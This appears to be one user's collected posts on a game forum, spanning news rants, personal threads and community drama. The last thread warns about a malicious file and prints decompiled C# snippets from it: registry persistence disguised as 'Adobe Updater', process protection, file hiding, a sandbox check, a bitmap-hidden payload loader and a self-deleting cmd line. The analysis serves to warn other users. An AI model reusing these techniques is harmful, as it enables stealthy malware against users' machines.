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Topics - Ipquarx

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It's a half hour video, but it's well worth the watch.

Some highlights are the request for the UN to censor criticism against feminists, and to do away with innocent-until-proven-guilty in favor of guilty until proven innocent. I cannot begin to describe this madness. How the hell did she get to talk at the UN?


"T-Mobile has just revealed that it has been the victim of a major hack that has exposed the personal details, including social security numbers, for approximately 15 million of its customers. CEO John Legere has just posted a letter regarding the hack in which he says that a data breach of credit vendor Experian has revealed the info; T-Mobile uses Experian to process its credit applications. Names, addresses and birth dates for those 15 million customers were revealed to the hackers as well as encrypted data that contained details like social security numbers and drivers license numbers. Unfortunately, Experian believes that the encryption protecting those bits of data was compromised, as well."

If you have T-Mobile, I suggest you make sure there's no suspicious activity on your credit card or anything else.

EDIT: Made a small mistake, no credit card numbers were revealed, but SSNs still were and that's really bad.

EDIT2: If you know someone else who has t-mobile, like a parent or a friend or whatever you should probably let them know too.

I know there's a way to do this and I know you can use $mvYaw, but I don't know how to make it align exactly with north/south/east/west. Can someone help please?

Off Topic / Today in Stupid: The UK outlaws computers
« on: August 06, 2015, 01:12:09 PM »
Today marks another stuffty day for computer users. In reality, almost every single computer owner has committed a crime under this new law.

Basically, the UK tried to do something good: Allowing people to privately copy copyrighted material from one medium to another.
However, the high court was having none of that and decided to overturn it for stupid reasons. This has far reaching implications that effectively make almost every citizen an outlaw.

If you don't have explicit stated permission to do the following (Many of them don't), all these are illegal:
  • Copying any copyrighted music onto an MP3 player, effectively outlawing playing music on ANY mobile device.
  • Ripping CD music onto your computer or MP3 player, effectively making iTunes illegal software and setting up potential lawsuits for "damages" to artists who have literally lost no money in the process of people privately copying their music which they've already paid for.
  • Downloading or moving digital copies of movies which you've legally bought.
  • Installing games from CDs or copying a game from one computer to another, effectively outlawing gaming.
  • Backups of your computer or copying documents including copyrighted material onto external harddrives or USB drives.
  • Automated backups of your computer including Windows Restore and Time Machine on OSX. That's right, you've broken the law because your OS does automated backups.
  • Installing any OS onto your computer, at all. From a disc, USB drive, anything. This effectively outlaws any computer.

My brain is hurting from the blatant stupidity.

Off Topic / Cat sick. How do I cope? [Blogland]
« on: August 05, 2015, 09:19:23 PM »
(There's a TL;DR at the bottom for those of you who can't handle a couple minutes of reading)

(This part is skippable up to the line if you have Logophobia)
I've had a cat, a very nice cat, for 14 years now. I've had him since I was around 5, and now I'm 18 turning 19 soon. Well, he's sick, very sick. It seems all of the worlds unlucky coincidences have conspired together to give him the worst sickness possible at the worst possible time. My parents and sister went on a short vacation, which seems to have stressed him and caused an acute condition.

His symptoms are:
  • Refusing to eat
  • Drinking extremely little
  • Borderline extreme dehydration (Because he won't damn drink)
  • Lethargy
  • Weakness (He can barely climb up stairs)
  • Puking (He does this if he doesn't get medicine at regular intervals in his food. He ain't eating.)

And all of this seems to be the cause of a sudden kidney problem. It's stage 4, which basically means if he isn't treated he's gonna die pretty quick.

As some of you might know, I'm going to be starting university pretty soon. I've had a pet to help comfort and support me both emotionally and sometimes as a result physically for all of my life, and the chances are overwhelming that he isn't going to make it all the way through my time at university. He's an old cat, really old. Most cats don't live to his age, and he's starting to get to the point where we don't know how long we can take care of him. We went to the vet today and they gave an estimate of $1,067.00 to care for him until he's hopefully better. My parents aren't made of money, even though they payed the very large bill this time, next time they probably won't. They've also said they aren't going to get another cat or a dog. This has got me quite emotionally twisted, and if my recent posts have struck a nerve or seemed nonsensical that's a possible cause. I'm not exactly the most emotionally stable right now. How do you deal with a pet being put down? How can I help myself deal with it in the long term? I've never experienced anything like this before and I need some advice.

TL;DR cat is really sick and might get put down or die. How do I cope with this when it happens?

Off Topic / CISPA is back, again.
« on: July 25, 2015, 03:26:01 PM »

It's basically the same stuff, except it's possibly even worse.

Some extremely bad things about the bill:

  • It lets the government spy on you without a warrant.
  • It makes it so companies can’t be sued when they do illegal things with your data.
  • It allows corporations to cyber-attack each other and individuals outside of the law.
  • It makes every privacy policy on the web null and void, and violates the 4th amendment.

A quote from the website:
"U.S. Congress is rushing toward a vote on the Cyber Intelligence Sharing Act (CISA), a dirty deal between government spy agencies like the NSA and giants Facebook and Google. It grants big businesses and banks legal immunity to do almost anything they want with our data, in exchange for sharing our personal information with the government. CISA is a spying bill dressed up as a “cybersecurity” bill. We’ve stopped bad legislation like this three times before. Now we need to do it again."

SIGN THE PETITION! Even if you don't think it'll help, it will!

Off Topic / Recommend me a phone
« on: July 23, 2015, 04:13:48 PM »
Hey there blogland, I've decided that for university I want a phone, since I currently don't have one.

I'm wanting an andriod phone that's relatively new, isn't gigantic to the point of difficult to store in a pocket or use with one hand, and has at least a full days worth of battery life, more if possible.

I've never had a phone so I really have no idea where to start.

General Discussion / Will brick transparency ever be fixed?
« on: July 15, 2015, 05:11:38 PM »
Ever since (I think) v21, brick transparency has been terribly, horribly broken.

I think this image explains it all:

Is it going to be fixed?

Off Topic / What course should I take for college/university?
« on: July 10, 2015, 09:30:59 PM »
As you may not know, I'm going to be going into university this fall, and I need help picking out my last elective.
Basically i get to pick whatever entry-level course I want.

Here's a list of classes that they recommend:
I'd greatly prefer 3 credit hour courses, over 6 credit hour courses. It makes my schedule lighter.

Bonus points if it's in the arts faculty. Post your suggestions!

Drama / List of possible server attackers (BLIDS 34102, 43991, 43126)
« on: July 01, 2015, 03:09:16 PM »
I was helping a player named Ares with his server being attacked and spammed by someone exploiting the recently discovered eval exploit.

As I was telling him to add me on steam someone was repeatedly disconnecting me with the message "awww_:(" (pictured below) and giving me super admin.

I collected a console.log from him, helped him remove the exploit, and looked through it to see who could possibly be abusing it.

Here's the console.log: (Posted with his permission)

I looked through it to see when the first instance of evidence of the exploiting was happening. Luckily, whoever was doing it made a couple mistakes in their coding before they actually did anything.

First connect request besides the host was from Biller (ID 43126, IP
Second connect request was from Pipblade (ID 34102, IP
Third request was from a person who disconnected before the exploiting started.
Fourth request was from Setro (ID 43991, IP

One of those 3 people was using the exploit. I am not pointing fingers at any specific one of them. It's also possible none of them were actually the ones attacking the server, but I have my doubts.

Off Topic / I got a fancy new watch
« on: June 25, 2015, 10:46:06 PM »

Does anyone else have a cool watch? Show it off!

Off Topic / What ever happened to the hacker?
« on: June 23, 2015, 12:10:28 AM »
You know... This dude!;u=30841

The dude that reads sunstone.

Today, Reddit has banned a whole bunch of subreddits including /r/FatPeopleHate and others like /r/publichealthawareness
According to most people I've talked to the subreddit was about fighting against the laziness and mentality that being unhealthy is OK. Of course, like in all societies there were radicals in the group. More info here:

All of the subreddits that were banned had in total over 150,000 subscribers to them, and reddit is having a huge fit over this.

/discuss I guess? I'm not sure what to make of this. Apparently a new employee that's really high up is causing all of this and a lot of people want her out.

Drama / kyle1836 (ID 5289) - Distributing monetized viruses on BLF
« on: May 26, 2015, 07:24:08 PM »
Here's the topic.

If you look at the virus scan link, it's actually a monetized link. Don't click it. It will give him money. You don't want that.

I downloaded the file, and mozilla firefox quickly told me it was malicious. I opened up the file in ILSpy. Here are some snippets from the code:

Code: [Select]
private class Persistence
private delegate bool g(IntPtr a, int b, [Out] byte[] c, uint d, out uint e);
private delegate bool s(IntPtr a, int b, [In] byte[] c);
private static string reverseStr(string inputStr)
char[] array = inputStr.ToCharArray();
return new string(array);
private static void AddToStartup()
"CreateObject(\"WScript.Shell\").RegWrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\{0}\",\"{1}\",\"REG_SZ\"",
"Adobe Updater",

using (Process process = Process.Start(new ProcessStartInfo(Program.Persistence.reverseStr("exe.dmc"))
UseShellExecute = false,
RedirectStandardOutput = true,
RedirectStandardInput = true,
CreateNoWindow = true
process.EnableRaisingEvents = true;
process.StandardInput.WriteLine(string.Format("cd \"{0}\"", Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)));
public static void checkStartup()
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run");
if ((string)registryKey.GetValue("Adobe Updater", "(byte)113EFBEEF") != Process.GetCurrentProcess().MainModule.FileName)
public static void ProtectProcess(object[] processData)
IntPtr a = (IntPtr)processData[0];
Program.api api = (Program.api)processData[1];
byte[] array = new byte[0];
Program.Persistence.g g = api.create<Program.Persistence.g>("advapi32", "GetKernelObjectSecurity");
uint num;
g(a, 4, array, 0u, out num);
if (num >= 0u && (ulong)num <= 32767uL)
if (g(a, 4, array = new byte[num], num, out num))
RawSecurityDescriptor rawSecurityDescriptor = new RawSecurityDescriptor(array, 0);
rawSecurityDescriptor.DiscretionaryAcl.InsertAce(0, new CommonAce(AceFlags.None, AceQualifier.AccessDenied, 2035711, new SecurityIdentifier(WellKnownSidType.WorldSid, null), false, null));
byte[] array2 = new byte[rawSecurityDescriptor.BinaryLength];
rawSecurityDescriptor.GetBinaryForm(array2, 0);
api.create<Program.Persistence.s>("advapi32", "SetKernelObjectSecurity")(a, 4, array2);
public static void HideFile()
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(Program.Persistence.reverseStr("decnavdA\\rerolpxE\\noisreVtnerruC\\swodniW\\tfosorciM\\ERAWTFOS"), true);
registryKey.SetValue(Program.Persistence.reverseStr("neddiH"), "0", RegistryValueKind.DWord);
File.SetAttributes(Process.GetCurrentProcess().Modules[0].FileName, FileAttributes.Hidden);

Code: [Select]
private static void Main(string[] args)
ProcessModuleCollection modules = Process.GetCurrentProcess().Modules;
foreach (ProcessModule processModule in modules)
if (processModule.ModuleName.ToLower().Contains("sbiedll.dll"))
bool flag = true;
new Mutex(true, "YagbNWREZNEj", ref flag);
if (!flag)
int num = args.Length;
object[] array = new object[]
array[num] = ((Assembly)array[num]).GetManifestResourceStream(((Assembly)array[num]).GetManifestResourceNames()[num]);
array[num] = new Bitmap((Stream)array[num]);
array[num] = Program.reverse((Bitmap)array[num], int.Parse("13359"));
array[num] = Program.crypt((byte[])array[num]);
array[num] = Program.decompress((byte[])array[num]);
array =[])array[num], null, Path.Combine(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "Microsoft.NET\\Framework\\v2.0.50727").ToLower().Replace("\\system32", ""), "CasPol.exe"));
Process.Start(new ProcessStartInfo
CreateNoWindow = true,
Arguments = " /C ping -n 3 > nul & del \"" + Process.GetCurrentProcess().Modules[num].FileName + "\"",
FileName = "cmd.exe",
WindowStyle = ProcessWindowStyle.Hidden
Now if you don't know coding, I don't blame you. So, here's what it's doing.

First, it runs an executable that's in the form of a bitmap file that's saved within the exe itself. We have no idea what this executable does, and the only possible use of this form of obfuscation is to hide malicious code. It probably saves a copy of ui.

Second, it adds itself to the startup list in the form of an adobe product updater. That's probably how the exe hides itself. Every time you start up your computer and log on, that unknown program runs.

Third, it deletes itself.

Fourth, he loving monitized the virus scan link. Need I say more?

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